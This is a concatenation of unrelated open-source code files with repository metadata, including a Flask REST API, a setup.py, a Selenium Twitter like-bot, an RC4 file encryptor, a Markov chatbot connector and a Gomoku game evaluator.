# pylint: disable=E0401,C0415
from tweet_details import list_of_tweets
except ModuleNotFoundError:
log_.critical("Keine Tweet-Details gefunden. Bitte get_tweet mit --mode mock ausführen.")
return []
return list_of_tweets
``` |
{
"source": "jonafato/ivadb",
"score": 2
} |
#### File: ivadb/ivadb/views.py
```python
from functools import wraps
from flask import Blueprint, render_template, request
from flask.ext.restful import abort, fields, reqparse, marshal_with, Resource
from flask.ext.security import current_user
from .core import api, db
from .models import Actor, Character, Series
from .utils import fields_from_model
bp = Blueprint('index', __name__)
@bp.route('/')
def index():
return render_template('index/index.html')
actor_fields = fields_from_model(Actor)
series_fields = fields_from_model(Series)
character_fields = fields_from_model(Character)
character_fields['actor'] = fields.Nested(actor_fields)
character_fields['series'] = fields.Nested(series_fields)
actor_parser = reqparse.RequestParser()
actor_parser.add_argument('name', type=str, required=True)
series_parser = reqparse.RequestParser()
series_parser.add_argument('name', type=str, required=True)
series_parser.add_argument('debut_year', type=int, required=True)
character_parser = reqparse.RequestParser()
character_parser.add_argument('name', type=str, required=True)
character_parser.add_argument('actor_id', type=int, required=True)
character_parser.add_argument('series_id', type=int, required=True)
def auth_to_modify(func):
@wraps(func)
def wrapper(*args, **kwargs):
if (request.method in ('POST', 'PUT', 'DELETE') and
not current_user.is_authenticated()):
abort(401)
return func(*args, **kwargs)
return wrapper
class ActorDetailResource(Resource):
method_decorators = [marshal_with(actor_fields), auth_to_modify]
def get(self, actor_id):
return Actor.query.get_or_404(actor_id)
def delete(self, actor_id):
actor = Actor.query.get(actor_id)
if actor:
db.session.delete(actor)
db.session.commit()
return '', 204
def put(self, actor_id):
args = actor_parser.parse_args()
actor = Actor.query.get(actor_id)
if not actor:
actor = Actor(id=actor_id)
db.session.add(actor)
actor.name = args['name']
db.session.commit()
return actor
class ActorListResource(Resource):
method_decorators = [marshal_with(actor_fields), auth_to_modify]
def get(self):
return Actor.query.all()
def post(self):
args = actor_parser.parse_args()
actor = Actor(**args)
db.session.add(actor)
db.session.commit()
return actor
class SeriesDetailResource(Resource):
method_decorators = [marshal_with(series_fields), auth_to_modify]
def get(self, series_id):
return Series.query.get_or_404(series_id)
def delete(self, series_id):
series = Series.query.get(series_id)
if series:
db.session.delete(series)
db.session.commit()
return '', 204
def put(self, series_id):
args = series_parser.parse_args()
series = Series.query.get(series_id)
if not series:
series = Series(id=series_id)
db.session.add(series)
series.name = args['name']
series.debut_year = args['debut_year']
db.session.commit()
return series
class SeriesListResource(Resource):
method_decorators = [marshal_with(series_fields), auth_to_modify]
def get(self):
return Series.query.all()
def post(self):
args = series_parser.parse_args()
series = Series(**args)
db.session.add(series)
db.session.commit()
return series
class CharacterDetailResource(Resource):
method_decorators = [marshal_with(character_fields), auth_to_modify]
def get(self, character_id):
return Character.query.get_or_404(character_id)
def delete(self, character_id):
character = Character.query.get(character_id)
if character:
db.session.delete(character)
db.session.commit()
return '', 204
def put(self, character_id):
args = character_parser.parse_args()
character = Character.query.get(character_id)
if not character:
character = Character(id=character_id)
db.session.add(character)
character.name = args['name']
character.actor_id = args['actor_id']
character.series_id = args['series_id']
db.session.commit()
return character
class CharacterListResource(Resource):
method_decorators = [marshal_with(character_fields), auth_to_modify]
def get(self):
return Character.query.all()
def post(self):
args = character_parser.parse_args()
character = Character(**args)
db.session.add(character)
db.session.commit()
return character
api.add_resource(ActorListResource, '/actors/')
api.add_resource(ActorDetailResource, '/actors/<int:actor_id>/')
api.add_resource(SeriesListResource, '/series/')
api.add_resource(SeriesDetailResource, '/series/<int:series_id>/')
api.add_resource(CharacterListResource, '/characters/')
api.add_resource(CharacterDetailResource, '/characters/<int:character_id>/')
``` |
{
"source": "jonafato/pytest-asyncio",
"score": 2
} |
#### File: jonafato/pytest-asyncio/setup.py
```python
import re
from pathlib import Path
from setuptools import setup, find_packages
def find_version():
version_file = Path(__file__).parent.joinpath('pytest_asyncio', '__init__.py').read_text()
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='pytest-asyncio',
version=find_version(),
packages=find_packages(),
url='https://github.com/pytest-dev/pytest-asyncio',
license='Apache 2.0',
author='<NAME>',
author_email='<EMAIL>',
description='Pytest support for asyncio.',
long_description=Path(__file__).parent.joinpath('README.rst').read_text(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Software Development :: Testing",
"Framework :: Pytest",
],
python_requires='>= 3.5',
install_requires=[
'pytest >= 3.0.6',
],
extras_require={
':python_version == "3.5"': 'async_generator >= 1.3',
'testing': ['coverage', 'async_generator >= 1.3'],
},
entry_points={
'pytest11': ['asyncio = pytest_asyncio.plugin'],
}
)
``` |
{
"source": "Jonah111122/tic-tac-toe",
"score": 4
} |
#### File: Jonah111122/tic-tac-toe/tictactoe.py
```python
class Player:
def __init__(self, symbol):
self.symbol = symbol
class Game:
def play(board, player, row, column):
board[row][column] = player.symbol
#Player uses numbers 1, 2 , 3 for horizontol movement and numbers 1, 2, 3 for vertical movement for example if player wanted to move to center of the board 2,2.
``` |
{
"source": "Jonah1234567/sliceSLAM",
"score": 3
} |
#### File: sliceSLAM/feature_matching/oscillator.py
```python
import numpy as np
from numba import jit, cuda
# move the second image not the first image
@jit(forceobj=True, target_backend='CUDA')
def oscillate(im1, im2):
min_diff = 9999999999
best_x, best_y = 0, 0
for x in range(-50, 51, 10): # this is pure jank, don't do grid search in the feature, or at least at first
for y in range(-50, 51, 10):
im_xi, im_xf, im_yi, im_yf = 0, 0, 0, 0 # better way to orient the different images?
if x > 0:
im_xi, im_xf = x, 0
elif x < 0:
im_xi, im_xf = 0, x
if y > 0:
im_yi, im_yf = y, 0
elif y < 0:
im_yi, im_yf = 0, y
im1_x, im1_y = np.shape(im1)
im2_x, im2_y = np.shape(im2)
temp_diff = m_norm_diff(im1[0 + im_xi:im1_x + im_xf, 0 + im_yi:im1_y + im_yf],
im2[0 - im_xf:im2_x - im_xi, 0 - im_yf:im2_y - im_yi]) # have fun
# understanding this later
if temp_diff < min_diff:
min_diff = temp_diff
best_x, best_y = x, y
for x in range(best_x - 5, best_x + 6, 1): # double-check the 6
for y in range(best_y - 5, best_y + 6, 1): # double-check the 6
im_xi, im_xf, im_yi, im_yf = 0, 0, 0, 0 # better way to orient the different images?
if x > 0:
im_xi, im_xf = x, 0
elif x < 0:
im_xi, im_xf = 0, x
if y > 0:
im_yi, im_yf = y, 0
elif y < 0:
im_yi, im_yf = 0, y
im1_x, im1_y = np.shape(im1)
im2_x, im2_y = np.shape(im2)
temp_diff = m_norm_diff(im1[0 + im_xi:im1_x + im_xf, 0 + im_yi:im1_y + im_yf],
im2[0 - im_xf:im2_x - im_xi, 0 - im_yf:im2_y - im_yi]) # have fun
# understanding this later
if temp_diff < min_diff:
min_diff = temp_diff
best_x, best_y = x, y
return best_x, best_y
def m_norm_diff(im1, im2): # manhattan normalization
if np.shape(im1) != np.shape(im2):
print("Warning submitted images do not match, fix this")
return 9999999999
norm_factor = len(im1) * len(im1[0])
diff = im1 - im2 # elementwise for np array
return sum(sum(abs(diff))) / norm_factor
``` |
{
"source": "JONAH5639/Twitter_Bot",
"score": 3
} |
#### File: JONAH5639/Twitter_Bot/Twitter_Bot.py
```python
from selenium import webdriver
from selenium.webdriver.common.keys import keys
import time
class TwitterBot:
def__init__(self,username,password):
self.username = username
self.password = password
self.bot = webdriver.Firefox()
def login(self):
bot = self.pygame.sprite.get_bottom_layer()
bot.get('https://twitter.com/')
time.sleep(3)
email = bot.find_element_by_class_name('email-input')
password = bot.find_element_by_name('session[password]')
email.clear()
password.clear()
email.send.keys(self.username)
password.send.keys(self.password)
password.send.keys(Keys.RETURN)
time.sleep(3)
def like_tweet(self, hashtag):
bot = self.bot
bot.get('https://twitter.com/search?q='+hashtag+'$src=typd')
time.sleep(3)
for i in range(1, 3):
bot.execute_script('window.scroollTo(0, document.body.scrollHeight)')
time.sleep(2)
tweets =bot.find_elements_by_class_name('tweet')
links = [elem.get_attribute('data-permalink-path')for elem in tweets]
for link in links:
bot.get('https://twitter.com' + link)
try:
bot.find_element_by_class_name('HeartAnimation').click()
time.sleep(10)
except Exception as ex:
time.sleep(60)
ed = TwitterBot('yourEmail', 'yourPassword')
ed.login()
ed.like_tweet()
``` |
{
"source": "jonahbaron/xml_authentication",
"score": 3
} |
#### File: jonahbaron/xml_authentication/rc4.py
```python
import base64
import argparse
def rc4(string,key):
string = [ord(char) for char in string]
key = [ord(char) for char in key]
klen = len(key)
S = range(256)
j = 0
for i in range(256):
j = (j + S[i] + key[i % klen]) % 256
S[i], S[j] = S[j], S[i]
i = 0
j = 0
newchars = []
for char in string:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
newchars.append(char ^ S[(S[i] + S[j]) % 256])
newchars = [chr(char) for char in newchars]
newstring = ''.join(newchars)
return newstring
def encfile(fname,key,outfile):
with open(fname) as f:
fcontent = f.readlines()
#print fcontent
encoding = base64.b64encode
output = []
for pstring in fcontent:
pstring = pstring.strip()
pstring = rc4(pstring,key)
cstring = encoding(pstring)
#print cstring
output.append(cstring + '\n')
#print output
with open(outfile, "wb") as f:
for line in output:
f.write(line)
def decfile(fname,key,outfile):
with open(fname) as f:
fcontent = f.readlines()
#print fcontent
decoding = base64.b64decode
output = []
for cstring in fcontent:
cstring = cstring.strip()
cstring = decoding(cstring)
pstring = rc4(cstring,key)
#print pstring
output.append(pstring + '\n')
#print output
with open(outfile, "wb") as f:
for line in output:
f.write(line)
def main():
parser = argparse.ArgumentParser(description="Encrypt or decrypt a file with RC4")
#parser.add_argument("filename", type=str, help="file to encrypt or decrypt")
parser.add_argument("key", type=str, help="key/password to encrypt or decrypt")
parser.add_argument("-e", "--encrypt", type=str, help="file to encrypt")
parser.add_argument("-d", "--decrypt", type=str, help="file to decrypt")
parser.add_argument("-o", "--output", type=str, help="output file", default="output.txt")
args = parser.parse_args()
if args.encrypt is not None:
encfile(args.encrypt,args.key,args.output)
elif args.decrypt is not None:
decfile(args.decrypt,args.key,args.output)
else:
print "RC4 Encryptor/Decryptor"
print "Please rerun script with the -e or -d flag"
if __name__ == "__main__":
main()
``` |
{
"source": "jonahbarrett/roodbot",
"score": 2
} |
#### File: roodbot/connectors/connector_common.py
```python
from markov_engine import MarkovTrieDb, MarkovFilters, MarkovGenerator
from models.structure import StructureModelScheduler
from common.nlp import CapitalizationMode
from typing import Optional, List
from multiprocessing import Process, Queue, Event
from threading import Thread
from queue import Empty
from spacy.tokens import Doc
from storage.armchair_expert import InputTextStatManager
import numpy as np
import random
class ConnectorRecvMessage(object):
def __init__(self, text: str, learn: bool=False, reply=True):
self.text = text
self.learn = learn
self.reply = reply
class ConnectorReplyGenerator(object):
def __init__(self, markov_model: MarkovTrieDb,
structure_scheduler: StructureModelScheduler):
self._markov_model = markov_model
self._structure_scheduler = structure_scheduler
self._nlp = None
def give_nlp(self, nlp):
self._nlp = nlp
def generate(self, message: str, doc: Doc = None, ignore_topics: List[str] = []) -> Optional[str]:
if doc is None:
filtered_message = MarkovFilters.filter_input(message)
doc = self._nlp(filtered_message)
subjects = []
for token in doc:
if(token.text in ignore_topics):
continue
markov_word = self._markov_model.select(token.text)
if markov_word is not None:
subjects.append(markov_word)
if len(subjects) == 0:
UNHEARD_LIST = ["Didn’t catch that",
"Try again",
"Are you even trying",
"That might be too much for me right now",
"I’ll learn how eventually",
"I don't know how to respond to that yet"]
UNHEARD_RESPONSE = random.choice(UNHEARD_LIST)
return UNHEARD_RESPONSE
def structure_generator():
sentence_stats_manager = InputTextStatManager()
while True:
choices, p_values = sentence_stats_manager.probabilities()
if len(choices) > 0:
num_sentences = np.random.choice(choices, p=p_values)
else:
num_sentences = np.random.randint(1, 5)
yield self._structure_scheduler.predict(num_sentences=num_sentences)
generator = MarkovGenerator(structure_generator=structure_generator(), subjects=subjects)
reply_words = []
sentences = generator.generate(db=self._markov_model)
if sentences is None:
MISUNDERSTOOD_LIST = ['Huh.',
'Huh',
'Huh!',
'Huh?',
'Huh!?',
'HUH?']
MISUNDERSTOOD_REPONSE = random.choice(MISUNDERSTOOD_LIST)
return MISUNDERSTOOD_REPONSE
for sentence in sentences:
for word_idx, word in enumerate(sentence):
if not word.compound:
text = CapitalizationMode.transform(word.mode, word.text)
else:
text = word.text
reply_words.append(text)
reply = " ".join(reply_words)
filtered_reply = MarkovFilters.smooth_output(reply)
return filtered_reply
class ConnectorWorker(Process):
def __init__(self, name, read_queue: Queue, write_queue: Queue, shutdown_event: Event):
Process.__init__(self, name=name)
self._read_queue = read_queue
self._write_queue = write_queue
self._shutdown_event = shutdown_event
self._frontend = None
def send(self, message: ConnectorRecvMessage):
return self._write_queue.put(message)
def recv(self) -> Optional[str]:
return self._read_queue.get()
def run(self):
pass
class ConnectorScheduler(object):
def __init__(self, shutdown_event: Event):
self._read_queue = Queue()
self._write_queue = Queue()
self._shutdown_event = shutdown_event
self._worker = None
def recv(self, timeout: Optional[float]) -> Optional[ConnectorRecvMessage]:
try:
return self._read_queue.get(timeout=timeout)
except Empty:
return None
def send(self, message: str):
self._write_queue.put(message)
def start(self):
self._worker.start()
def shutdown(self):
self._worker.join()
class Connector(object):
def __init__(self, reply_generator: ConnectorReplyGenerator, connectors_event: Event):
self._reply_generator = reply_generator
self._scheduler = None
self._thread = Thread(target=self.run)
self._write_queue = Queue()
self._read_queue = Queue()
self._frontends_event = connectors_event
self._shutdown_event = Event()
self._muted = True
def give_nlp(self, nlp):
self._reply_generator.give_nlp(nlp)
def start(self):
self._scheduler.start()
self._thread.start()
def run(self):
while not self._shutdown_event.is_set():
message = self._scheduler.recv(timeout=0.2)
if self._muted:
self._scheduler.send(None)
elif message is not None:
# Receive the message and put it in a queue
self._read_queue.put(message)
# Notify main program to wakeup and check for messages
self._frontends_event.set()
# Send the reply
reply = self._write_queue.get()
self._scheduler.send(reply)
def send(self, message: str):
self._write_queue.put(message)
def recv(self) -> Optional[ConnectorRecvMessage]:
if not self._read_queue.empty():
return self._read_queue.get()
return None
def shutdown(self):
# Shutdown event signals both our thread and process to shutdown
self._shutdown_event.set()
self._scheduler.shutdown()
self._thread.join()
def generate(self, message: str, doc: Doc=None) -> str:
return self._reply_generator.generate(message, doc)
def mute(self):
self._muted = True
def unmute(self):
self._muted = False
def empty(self):
return self._read_queue.empty()
``` |
{
"source": "jonahbron/Lock",
"score": 2
} |
#### File: Lock/lock/main.py
```python
import click
from lock.app import actions
@click.group()
def cli():
'''Lock is a simple tool for the purpose of securely storing and sharing
sensitive information.
'''
cli.add_command(actions.add)
cli.add_command(actions.get)
``` |
{
"source": "jonah-chen/alphazero-guerzhoy",
"score": 3
} |
#### File: alphazero-guerzhoy/15x15/debug.py
```python
import numpy as np
# from gomoku import print_board
import trainGomoku as gm
from game import print_board
from nptrain import is_win
def random_board(shape, bad=False):
board = np.random.randint(-1, 2, size=shape)
if bad:
return convert_good_to_bad_board(board)
return board
def convert_good_to_bad_board(good_board):
bad_board = good_board.tolist()
for i in range(len(bad_board)):
for j in range(len(bad_board[0])):
if bad_board[i][j] == 0:
bad_board[i][j] = ' '
elif bad_board[i][j] == 1:
bad_board[i][j] = 'b'
elif bad_board[i][j] == -1:
bad_board[i][j] = 'w'
return bad_board
def convert_to_one_hot(bad):
arr = np.zeros((15, 15, 2,), dtype='float32')
for i in range(15):
for j in range(15):
if bad[i][j] == 'b':
arr[i, j, 0] = 1.0
elif bad[i][j] == 'w':
arr[i, j, 1] = 1.0
return arr
if __name__ == '__main__':
prob = [['', ' ', ' ', 'b', ' ', ' ', '', 'w'],
['b', '', 'b', 'w', 'w', '', ' ', 'w'],
['b', '', 'w', 'b', 'b', 'w', ' ', 'b'],
[' ', '', 'w', '', 'b', ' ', 'b', ''],
['w', 'w', 'w', 'b', 'w', ' ', 'b', 'w'],
['w', '', 'b', 'w', 'b', 'w', '', ''],
['w', '', 'b', 'b', '', '', 'w', ' '],
['b', 'w', 'w', ' ', 'b', '', 'b', ' ']]
prob = convert_to_one_hot(prob)
print_board(prob)
print(is_win(prob))
# gm.init()
# gm.print_board()
# turns = 0
# while(gm.is_win() == 0):
# y = int(input("\nyval"))
# x = int(input("\nxval"))
# if turns % 2 == 0:
# if gm.move(y,x,1) == 0:
# turns += 1
# gm.print_board()
# else:
# if gm.move(y,x,2) == 0:
# turns += 1
# gm.print_board()
# pie = np.load('selfplay_data/0000/pie.npy')
# z = np.load('selfplay_data/0000/z.npy')
# s = np.load('selfplay_data/0000/s.npy')
#
# print(f'{pie.shape} {z.shape} {s.shape}')
#
# for i in range(100):
# print(pie[i])
# print_board(s[i])
```
#### File: alphazero-guerzhoy/15x15/gomoku.py
```python
def is_empty(board):
'''Return True iff the board is empty
'''
for i in board:
for j in i:
if ' ' != j:
return False
return True
def is_bounded(board, y_end, x_end, length, d_y, d_x):
'''Return 'OPEN' for open sequences, 'SEMIOPEN' for semiopen sequences
and 'CLOSED' for closed sequences. Open, Semipoen, and Closed are
defined in ESC180H1F
'''
# Check (y_end + d_y, x_end + d_x) is empty
# or (y_end - length * d_y, x_end - length * d_x) is empty
y1, x1, y2, x2 = y_end + d_y, x_end + d_x, y_end - length * d_y, x_end - length * d_x
length = len(board)
state = 1
# If one end exceeds the border, no stones can be placed, or if the square is occupied
# The or short circuits, thus, no index error should be thrown
if (y1 < 0 or x1 < 0 or y1 >= length or x1 >= length or board[y1][x1] != ' '):
state -= 1
if (y2 < 0 or x2 < 0 or y2 >= length or x2 >= length or board[y2][x2] != ' '):
state -= 1
# hAhA nO SwitCH StATeMenT iN pYThoN
if state == 1:
return 'OPEN'
if state == 0:
return 'SEMIOPEN'
if state == -1:
return 'CLOSED'
return 'ERROR!'
def detect_row(board, col, y_start, x_start, length, d_y, d_x):
'''Return a tuple whose first element is the number of open sequences
of color col of length length in the row R and the second element is
the number of semiopen sequences of length length in row R
'''
open_seq_count, semi_open_seq_count = 0, 0
# starts at (y_start, x_start) and goes in the direciton (d_y, d_x)
dir = -1
if (x_start == 0 or y_start == 0):
dir = 1
board_size = len(board)
# Create the stuff for the row R and puts it into a list in order.
# Cannot use ndarray :( because they are not allowed
R = []
x_counter, y_counter = x_start, y_start
while (x_counter >= 0 and y_counter >= 0 and x_counter < board_size and y_counter < board_size):
R.append(board[y_counter][x_counter])
y_counter += dir * d_y
x_counter += dir * d_x
# Checks for errors
if len(R) <= length:
return (0, 0)
# Checks for sequences at the edges
if R[:length] == [col] * length and R[length] == ' ':
semi_open_seq_count += 1
if R[-length:] == [col] * length and R[-length - 1] == ' ':
semi_open_seq_count += 1
# iterate through R
for w in range(1, len(R) - length):
if R[w:w + length] == [col] * length:
# Check open sequences
if R[w - 1] == ' ' and R[w + length] == ' ':
open_seq_count += 1
# Check semi open sequences
elif (R[w - 1] == ' ' or R[w + length] == ' ') and R[w + length] != col and R[w - 1] != col:
semi_open_seq_count += 1
return open_seq_count, semi_open_seq_count
def detect_rows(board, col, length):
'''Return a tuple whose first element is the number of open sequences
of color col and length length on the entire board, and whose second
element is the number of semi-open sequences of color col and length
length on the entire board.
'''
open_seq_count, semi_open_seq_count = 0, 0
board_length = len(board)
for w in range(board_length):
# Checks for up to down sequences
x1, x2 = detect_row(board, col, 0, w, length, 1, 0)
open_seq_count += x1
semi_open_seq_count += x2
# Checks for left to right sequences
x1, x2 = detect_row(board, col, w, 0, length, 0, 1)
open_seq_count += x1
semi_open_seq_count += x2
# Checks for diagonal sequences like
# X
# X
# X
x1, x2 = detect_row(board, col, 0, w, length, 1, 1)
open_seq_count += x1
semi_open_seq_count += x2
if w != 0:
x1, x2 = detect_row(board, col, w, 0, length, 1, 1)
open_seq_count += x1
semi_open_seq_count += x2
# Checks for diagonal sequences like
# X
# X
# X
x1, x2 = detect_row(board, col, w, 0, length, -1, 1)
open_seq_count += x1
semi_open_seq_count += x2
if w != 0:
x1, x2 = detect_row(board, col, board_length - 1, w, length, 1, -1)
open_seq_count += x1
semi_open_seq_count += x2
return open_seq_count, semi_open_seq_count
'''
def search_max(board):
move_y, move_x = -1, -1
max_score = -11111111111111111111111111111111111111111111111
for i in range(8):
for j in range(8):
if (board[i][j] == ' '):
board[i][j] = 'b'
if iswin(board) == 1:
return i, j
s = score(board)
if (s > max_score):
move_y, move_x = i, j
max_score = s
board[i][j] = ' '
return move_y, move_x
'''
def copy_new(board):
length_board = len(board)
new_board = [[' ']*8 for a in range(8)]
for c in range(8):
for d in range(8):
new_board[c][d] = board[c][d]
return new_board
def search_max(board):
scores_list = []
coords_list = []
for i in range(8):
for j in range(8):
if board[i][j] == ' ':
new_board = copy_new(board)
new_board[i][j] = 'b'
coords_list.append((i, j))
scores_list.append(score(new_board))
ind = scores_list.index(max(scores_list))
return coords_list[ind]
def score(board): # return int
'''Basic scoring polynomial returns int score. Higher score is better for black.'''
MAX_SCORE = 100000
open_b = {}
semi_open_b = {}
open_w = {}
semi_open_w = {}
for i in range(2, 6):
open_b[i], semi_open_b[i] = detect_rows(board, "b", i)
open_w[i], semi_open_w[i] = detect_rows(board, "w", i)
if open_b[5] >= 1 or semi_open_b[5] >= 1:
return MAX_SCORE
elif open_w[5] >= 1 or semi_open_w[5] >= 1:
return -MAX_SCORE
return (-10000 * (open_w[4] + semi_open_w[4])+
500 * open_b[4] +
50 * semi_open_b[4] +
-100 * open_w[3] +
-30 * semi_open_w[3] +
50 * open_b[3] +
10 * semi_open_b[3] +
open_b[2] + semi_open_b[2] - open_w[2] - semi_open_w[2])
def iswin(board):
draw = True
for i in range(len(board)):
for j in range(len(board)):
if draw and board[i][j] == ' ':
draw = False
# horizontal case:
if j + 4 < len(board):
temp_1 = []
for b in range(5):
temp_1.append(board[i][j+b])
if (temp_1 == ["b"] * 5):
return 1
if (temp_1 == ["w"] * 5):
return 0
# vertical case:
elif i + 4 < len(board):
temp_2 = []
for c in range(5):
temp_2.append(board[i+c][j])
if (temp_2 == ["b"] * 5):
return 1
if (temp_2 == ["w"] * 5):
return 0
# diagonal cases:
# first case: increasing the row number and the column number:
elif i + 4 < len(board) and j + 4 < len(board):
temp = []
for a in range(5):
temp.append(board[i+a][j+a])
if (temp == ["b"] * 5):
return 1
if (temp == ["w"] * 5):
return 0
# second case: increasing the row number but decreasing the column number:
elif i + 4 < len(board) and j - 4 < len(board):
temp_3 = []
for d in range(5):
temp_3.append(board[i+d][j-d])
if (temp_3 == ["b"] * 5):
return 1
if (temp_3 == ["w"] * 5):
return 0
if draw:
return 2
return 3
def iswindebugging(board):
draw = True
for i in range(len(board)):
for j in range(len(board)):
if draw and board[i][j] == ' ':
draw = False
# horizontal case:
if j + 4 < len(board):
temp_1 = []
for b in range(5):
temp_1.append(board[i][j+b])
if (temp_1 == ["b"] * 5):
return 1, i, j
if (temp_1 == ["w"] * 5):
return 0, i, j
# vertical case:
elif i + 4 < len(board):
temp_2 = []
for c in range(5):
temp_2.append(board[i+c][j])
if (temp_2 == ["b"] * 5):
return 1, i, j
if (temp_2 == ["w"] * 5):
return 0, i, j
# diagonal cases:
# first case: increasing the row number and the column number:
elif i + 4 < len(board) and j + 4 < len(board):
temp = []
for a in range(5):
temp.append(board[i+a][j+a])
if (temp == ["b"] * 5):
return 1, i, j
if (temp == ["w"] * 5):
return 0, i, j
# second case: increasing the row number but decreasing the column number:
elif i + 4 < len(board) and j - 4 < len(board):
temp_3 = []
for d in range(5):
temp_3.append(board[i+d][j-d])
if (temp_3 == ["b"] * 5):
return 1, i, j
if (temp_3 == ["w"] * 5):
return 0, i, j
if draw:
return 2
return 3
def newiswin(board):
draw = True
for i in range(len(board)):
for j in range(len(board)):
if draw and board[i][j] == ' ':
draw = False
if (j + 4 < len(board)):
if (board[i][j] == 'b' and
board[i][j + 1] == 'b' and
board[i][j + 2] == 'b' and
board[i][j + 3] == 'b' and
board[i][j + 4] == 'b' and
(j < 1 or board[i][j - 1] != 'b') and
(j + 5 >= 8 or board[i][j + 5] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i][j + 1] == 'w' and
board[i][j + 2] == 'w' and
board[i][j + 3] == 'w' and
board[i][j + 4] == 'w' and
(j < 1 or board[i][j - 1] != 'w') and
(j + 5 >= 8 or board[i][j + 5] != 'w')):
return 0
if (i + 4 < len(board)):
if (board[i][j] == 'b' and
board[i + 1][j + 1] == 'b' and
board[i + 2][j + 2] == 'b' and
board[i + 3][j + 3] == 'b' and
board[i + 4][j + 4] == 'b' and
(i < 1 or j < 1 or board[i - 1][j - 1] != 'b') and
(i + 5 >= 8 or j + 5 >= 8 or board[i + 5][j + 5] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i + 1][j + 1] == 'w' and
board[i + 2][j + 2] == 'w' and
board[i + 3][j + 3] == 'w' and
board[i + 4][j + 4] == 'w' and
(i < 1 or j < 1 or board[i - 1][j - 1] != 'w') and
(i + 5 >= 8 or j + 5 >= 8 or board[i + 5][j + 5] != 'w')):
return 0
if (i - 4 >= 0):
if (board[i][j] == 'b' and
board[i - 1][j + 1] == 'b' and
board[i - 2][j + 2] == 'b' and
board[i - 3][j + 3] == 'b' and
board[i - 4][j + 4] == 'b' and
(i + 1 >= 8 or j < 1 or board[i + 1][j - 1] != 'b') and
(i < 5 or j + 5 >= 8 or board[i - 5][j + 5] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i - 1][j + 1] == 'w' and
board[i - 2][j + 2] == 'w' and
board[i - 3][j + 3] == 'w' and
board[i - 4][j + 4] == 'w' and
(i + 1 >= 8 or j < 1 or board[i + 1][j - 1] != 'w') and
(i < 5 or j + 5 >= 8 or board[i - 5][j + 5] != 'w')):
return 0
if (i + 4 < len(board)):
if (board[i][j] == 'b' and
board[i + 1][j] == 'b' and
board[i + 2][j] == 'b' and
board[i + 3][j] == 'b' and
board[i + 4][j] == 'b' and
(i + 5 >= 8 or board[i + 5][j] != 'b') and
(i < 1 or board[i - 1][j] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i + 1][j] == 'w' and
board[i + 2][j] == 'w' and
board[i + 3][j] == 'w' and
board[i + 4][j] == 'w' and
(i + 5 >= 8 or board[i + 5][j] != 'w') and
(i < 1 or board[i - 1][j] != 'w')):
return 0
if draw:
return 2
return 3
def is_win(board):
states = ["White won", "Black won", "Draw", "Continue playing"]
return states[newiswin(board)]
def print_board(board): # return void
s = "*"
for i in range(len(board[0])-1):
s += str(i%10) + "|"
s += str((len(board[0])-1)%10)
s += "*\n"
for i in range(len(board)):
s += str(i%10)
for j in range(len(board[0])-1):
s += str(board[i][j]) + "|"
s += str(board[i][len(board[0])-1])
s += "*\n"
s += (len(board[0])*2 + 1)*"*"
print(s)
def make_empty_board(sz):
board = []
for _ in range(sz):
board.append([" "]*sz)
return board
def analysis(board):
for c, full_name in [["b", "Black"], ["w", "White"]]:
print("%s stones" % (full_name))
for i in range(2, 6):
open, semi_open = detect_rows(board, c, i)
print("Open rows of length %d: %d" % (i, open))
print("Semi-open rows of length %d: %d" % (i, semi_open))
def play_gomoku(board_size):
board = make_empty_board(board_size)
board_height = len(board)
board_width = len(board[0])
while True:
print_board(board)
if is_empty(board):
move_y = board_height // 2
move_x = board_width // 2
else:
move_y, move_x = search_max(board)
print("Computer move: (%d, %d)" % (move_y, move_x))
board[move_y][move_x] = "b"
print_board(board)
analysis(board)
game_res = is_win(board)
if game_res in ["White won", "Black won", "Draw"]:
return game_res
print("Your move:")
move_y = int(input("y coord: "))
move_x = int(input("x coord: "))
board[move_y][move_x] = "w"
print_board(board)
analysis(board)
game_res = is_win(board)
if game_res in ["White won", "Black won", "Draw"]:
return game_res
def put_seq_on_board(board, y, x, d_y, d_x, length, col):
for _ in range(length):
board[y][x] = col
y += d_y
x += d_x
def test_is_empty():
board = make_empty_board(8)
if is_empty(board):
print("TEST CASE for is_empty PASSED")
else:
print("TEST CASE for is_empty FAILED")
def test_is_bounded():
board = make_empty_board(8)
x = 5; y = 1; d_x = 0; d_y = 1; length = 3
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
y_end = 3
x_end = 5
if is_bounded(board, y_end, x_end, length, d_y, d_x) == 'OPEN':
print("TEST CASE for is_bounded PASSED")
else:
print("TEST CASE for is_bounded FAILED")
def test_detect_row():
board = make_empty_board(8)
x = 5; y = 1; d_x = 0; d_y = 1; length = 3
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
if detect_row(board, "w", 0,x,length,d_y,d_x) == (1,0):
print("TEST CASE for detect_row PASSED")
else:
print("TEST CASE for detect_row FAILED")
def test_detect_rows():
board = make_empty_board(8)
x = 5; y = 1; d_x = 0; d_y = 1; length = 3; col = 'w'
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
if detect_rows(board, col,length) == (1,0):
print("TEST CASE for detect_rows PASSED")
else:
print("TEST CASE for detect_rows FAILED")
def test_search_max():
board = make_empty_board(8)
x = 5; y = 0; d_x = 0; d_y = 1; length = 4; col = 'w'
put_seq_on_board(board, y, x, d_y, d_x, length, col)
x = 6; y = 0; d_x = 0; d_y = 1; length = 4; col = 'b'
put_seq_on_board(board, y, x, d_y, d_x, length, col)
print_board(board)
if search_max(board) == (4,6):
print("TEST CASE for search_max PASSED")
else:
print("TEST CASE for search_max FAILED")
def easy_testset_for_main_functions():
test_is_empty()
test_is_bounded()
test_detect_row()
test_detect_rows()
test_search_max()
def some_tests():
board = make_empty_board(8)
board[0][5] = "w"
board[0][6] = "b"
y = 5; x = 2; d_x = 0; d_y = 1; length = 3
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
analysis(board)
# Expected output:
